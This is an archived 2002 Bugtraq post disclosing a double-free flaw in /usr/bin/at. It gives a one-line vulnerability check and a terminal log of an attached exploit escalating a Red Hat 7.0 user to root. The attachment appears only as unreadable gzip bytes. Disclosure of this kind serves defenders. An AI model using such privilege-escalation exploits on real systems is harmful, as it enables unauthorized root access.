7828881 2002-01-17 13:19 +1300 /51 rader/ zen-parse <zen-parse@gmx.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-17 18:34 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20581>
Ärende: '/usr/bin/at 31337 + vuln' problem + exploit
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201171313030.13586-101000@clarity.local>
Affects: /usr/bin/at
To check if you are potentially vulnerable to this exploit, execute:
/usr/bin/at 31337 + vuln
If you are vulnerable this will cause:
Segmentation fault
If not, there will be a message similar to:
Garbled time
(possibly with some extra information)
The problem is caused by a bug in the parser which deallocates the
same memory location twice.
This can sometimes be exploited, for the uid of "daemon", and due to
some other minor problems, may allow root access from there.
Attached is an exploit for Redhat 7.0.
bash-2.04$ rpm -qf /lib/libc-* glibc-2.2.4-18.7.0.3 bash-2.04$ rpm
-qf /usr/bin/at at-3.1.8-12 bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn bash-2.04$ id uid=500(evil) gid=500(evil)
groups=500(evil) bash-2.04$ ./doit.sh woot-2.04# id uid=0(root)
gid=0(root) groups=500(evil) woot-2.04# echo "I was just testing
something and you need to fix at or some malicious hacker could be
evil." |mail -s "Fix /usr/bin/at" root woot-2.04# exit bash-2.04$
-- zen-parse
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it
may be redistributed without modification.
2) In any other case the contents of this message is confidential and not
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.
(7828881) /zen-parse <zen-parse@gmx.net>/-(Ombruten)
Bilaga (application/x-gzip) i text 7828882
7828882 2002-01-17 13:19 +1300 /25 rader/ zen-parse <zen-parse@gmx.net>
Bilagans filnamn: "attn.tar.gz"
Importerad: 2002-01-17 18:34 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20582>
Bilaga (text/plain) till text 7828881
Ärende: Bilaga (attn.tar.gz) till: '/usr/bin/at 31337 + vuln' problem + exploit
------------------------------------------------------------
���;®D<��íZ{wÛ¶�Ïßü��ëÔRBK¤D=\GÉéÒ¤ÉÙòXë5vw@�´8S$Ã-õ±Ï¾ß�@ò#ÙάÛ��K"pqû¾� /Ëdxçã6ÛvíÙdoÛMÝoÝîØ3wä8£ÉØݱ�{2�Ýa¼/Ùª¢ä9cwÄE�¿�îCãÿ¥ü*
¥ãAd¿ý�§=uÝ[åïLüñ?NF�ÆÎ�fÿö[¹ÞþÏå¿âQÒë�?�¬�e. �=Û²ûGúùlû\%q÷Ìç¯_>�BmVÙVoL��káÇ=sèEШ¥iiZrò¯ÆήÝܤýóà'¾�>ùÐþgö¤öÿS{:%û§ÐÙÿ'hß%~Ì"
#�°'iRæi�ãç«Ê��ó" Ó|ÅË(M�©ö_ð¸x§Y���`5ní¹ªçÛLø�æ>çI�orƾ�ïª(��¿JK<�gÁ½X°2eÏÒ\Dg �$�<.�Ãp¹gÏí¹�Üsݱ�M�O�ü!vÌ 7Ó`î�û6�ð1y¡;�
|>�S1�\Ï·Ýñát$FÎÜO]1ã3ß8#>��3�Þ� ÀÀC2å¾ç ûÐà©=ø£À�ÚsgìzîØñ�9@}Ç�OlgæÏ&¡�SǾÆ#��º>�F�Ì<Ï�|×�{ópâÏ=1�¹çO§á�öÁ�m'zÜQ�a�ÿ\þ
ùKû�£$��ËßL©®4iÿ#û6ûw�wv%þl¸Îþ?Aûì®×Ægìx��¬ðó(+Ï�æ V�Ð9X"|Æ.Óü¥UÉÊ¥`~çÂ/�\A%
�,@-åøWO�ÿðúÕS�Sgß¾øA����9÷�Ãb´ÊYG�úGss!z}9#�ÒL$ô�/JJ¢$¯�VO_èÕI¬³8JÂR¤+>ÀÅÑ9mi¯^ñ@ÜY
;HÙ2�¨¿���ó
~æ'Ï¿<fÐ?LëE!Jv�]¾Wé]åé*+-|¢`?>�-ó
ãgÈ¢�}&×�gH°�3_�!æÎr£©
�Y¡¤��!ÅB°i90�òzÉ6/�A
�WqI©�ñ¡`AìR.Ä�~ät�íĵL/I>g¢ÔtâÁ«¢8°ä��¯Ò¢$äQÂK�o0P@üä�ðì52r�7èÁÖü�CرÞ\�|Ü.*i/£8Ö{Ý�(J6��tA°Y
/(ãÁº/A¤¸¨âDä´Aɬ?T�^4�PZ©±\]êLnÛ%Câà°�í��tÉ/@%mZæ±�°03ÊɱI�x�ú�®¢Ì+©wP,0,
Ù%í û�R(�0§Ï«<ÁX¨¹³Ê*(.[¥IT¦9é'�õÙ× ³,�Ð=àÉx&r³çg�Z0
Ø���lÏós¡¦ûìû<*Y��é%�èbW ��Û£�ò�¡¸fuJã D_EAmòçQ�DBJPÏÜ �²�å�ÎIf«M!âpPC½¡-´&Be
�lQ�c#i�°KJ�
�ÅdwQ¹$Z
Ðí³'qZ�å�ÄF(�@ãý4 eqÞ9TæI¸8
ÕôI½&~5³eï´ÏÞDþ9«2É�Å]92ë³çBB4Õ¬+Ó"��ä&[S¡À�~æ�}×ê)ñÍûì
RA¸�¸�?)ü(
�¦°À}0q"A�kEQKjõôåâ §eÑ_¶ÚIr�»Ï¾K�'c[R�iÅË<-
¯ë1RÑR�¾¬Å_ë¸�ëÔ,VD«,¾¾øB}ùÝçï¬�Ãø¨waÕ�çÌÍ|Å�B6¼à¹rcg<¾¿}.9Óß�®;�/
M'��í~a
Eé[4dí7E¦±EðæÛ,¬K'`Ë�d+NZUÓA±�Ö� �ßtd´´LϤÍî#�ì×bKĺÌÅT(T�Xf½�8üA MMÁp»;�=�¾JOîîöÝ�n
1�)èôó�Õ[ù·Ô+änmÁ·Oÿl�¿TçC6¬\R�ÅyÔbµá/W)H°n�À�þ2evä úHVS�Ù�
¹��nBt£GÃ@\�*»òÿ÷Údþ�Pæôqóÿ÷ÿ'îøZþ?v»üÿS´mþoÔY5£
3A´üÙ`ÊASÎøw}æç!�ÂÿÀozò�'��i�®:¶�Í9!aBÿö¼Ù×sò:?¦<þþÐøµµ�$%´�étö��ÏAá�LÝoþ��zÅ7*÷«óSD�Ù�Û-D(£ûÀdMª¡ü·Cën�^q¤\ �¿e�AM�;e¿üÂVçA7]è m/ù9E�ÝmÒ)jÀ#¦sÓ¯^|cû{ôsß´öÙC¹(ÉàGå°#�dQ&4«P¨àa�?~¬¾³E
Ñ�²ÍµLµ%A,z(å¥�k-¢$EZâ}�"-Y½a-æ�º�y�&7�ÐÂܨ ;HPo�qä½g¥+ ,¶£2ÍzÞöRM·¡�V(jDõµ.�(+åÔ�É�Ø8Bhkâ�)@u>6è gø¶âÆM�ÚÕ8{GÓ«µtÝÖûúÙ³o�·u´Aá,�s|ç¤ ��>M�[ÃÈö,yr¦éEZ©2B¨Òg²îkÕ릮MÆA2�8e£�Ooµ¿7Ú¿:eo¼�`2¼�I%�*�RâHÕ¤.II/�û�H�@ß{o¾ÿÊ#Hó�¿|�£YÔI�ed�:
ÜÉ�o2°zìV"¯HB¶S»,�^!ox�ßlÃ$�d!ÇÚÛ�$jèôBäE9½Õ�E#�DÊþ0B¡1�@Ö
Ë�¯)a�¶º¸¡xÊHï½]�?eNJ® [}'z/zÊ»�ÌT_�yHó})W*Ì5 £Ã_·Éþ��lï3$]¯¦GWÇêYZv{$PÕ«õ:¶Z!7®L]9gå¹õâ]½äÖ]�µåìµî³ä³ÃöFlol(tòQá¿
i;�Í®X~ß¹¯Ìÿt|øXk|àþDZgWï»óßOÕjwý§�¯þxüTH�ã�azå"Ny`���\ÏGd¿_Èâ,G��{¦>se!_
¾`÷Ä´
u��=GÞü�Û+fLcaûj�þnûVý£¹x®n�õÈ»z&Y¼u��¡<)6¥3%?,oHe/]A�&
{wÃ>Ñ`ê³QuF2 $hBËe-èÝ>�FõÂöõ÷î2òÄb&Õxr�ÊIÅf%!�GfBQ�0·
s:�IÒ�lzkþLÅ�xÿ�¿=ÍÚ|¨½ByRÈ?��Äã«4·\`¥ÝÀ�)T»Äºûüÿ&ýÿ6ÿ(k|èþ^ö¹âÿ'î¬óÿ¢ý5J`ÔÊ;Ã[ÀÓ
åj
ÊB·^ïzX �W^&·¼�dé�´¿º
h:s(P°_
¤R%ÛÝ�C¬)ûWõËÇZã�öïºôÎÏüoÒÙÿ'iÆpÈzú¦ÙbA*
Êä�¢º��£us§N·N1óâôò1{�«PFÅÈèÊh
ª�«ÎäaC�2:<>|ÈòÔW÷Ü�ÖÎcÑÍ9ûªGÅ�,AÁKÙ�]7×
õ6PUö
|�Q¸Ù�hè÷�¢DÞÿ#ÏI�ºvå�ýî�]Í`F�6) �j¶B¾C=ÆWÐ-k+�{ßÉÈÕsæY©ú�¬Ï�i1ñü¬ZaiÆ��}[�ÊS�ð5_QNÛ�3PÙÒiI�0áâs*©ë�Q§ <��©¼Pèe�ÞÌ�©_}=niQô�á?Z�ë5¾¨IìÓ��ÌAúf?
�y!Þ.�ód-¼µ�¬'âd=?<YϦ'kÎOÖcçdíÛè¬]ôÍfjÜ4Í÷OÖ�mOuc|���j:ýL�ßs[N#¬��f»�ÆNð��<�ëÓ ¦TÈG¨WPô¨ØxgIrî½M��ÉP÷îîÂég�òÚ�LË�$^_f:þ� �Õ¯ßmÝ^¡¸�Mf®DVoÕ òã�x](Qü£�üN¯\ÄBd=²m¦�¨uQEä(5÷Iõo\4$ÿd/lë��k/�Cú?Ò��
8j@п�õwÀè§�TH�@=¼�M¦öiÝ]¾H?Þty7ô5�¥�NeEUDg��ÀýìZW,�D&ÈSÿZ�e_=%ëæÈF�QºiÖ±Ì{Å=ÿ^´Ì²¦Ió^¶hº°töàÁVâ÷³�8²
?ê=(Á¶Ç9ß?pnðý�Ää&�ÏkA¸�L�q_³�dp=m×u^%OÖzvzHÇ2[O;¬T,SO
(Õï¿ÿÚ½}©kZZót¥
DÚL´�ѬÓyÞ ~д k©åu»�j' ®�6@ßÚ§�äl%V
(åþmKª´v÷úжԻrHÉ8^�ô´Î4Òî?Ð=Êáõï¹GñÃCy�?X¸�Òàø�¿ØGMC�a«c$;ÂmÇøT�¢¡æ¼'Yÿåññ«��*IÏÛ��^�J.$ �ÉÓ�«·O2Væôò
ÁM¬Pò/s?Û( �ÿ°��M%
Ö�Ô×Ó>§=jòi¥Sk¸o)�
+ä9Ûi«}m£í%½*Eù0YzÙC¬²�Ûåq¼±$4�3u4Èïq/ÞPGøCÓRG÷AyøUÑl}C°L«3¤%EÊ.)óy.Ç�Ö)J�-)O x�§¾|���Pæ�
½\F±¨5tøáȵûL²Ï/$ûä]ì¨OSÔ)V{�N¤U�]qÒµ®uk]ëZ׺ֵ®uk]ëZ׺ֵ®uk]ëZ׺ֵßkû�Äï¼�P��
(7828882) /zen-parse <zen-parse@gmx.net>/-(Ombruten)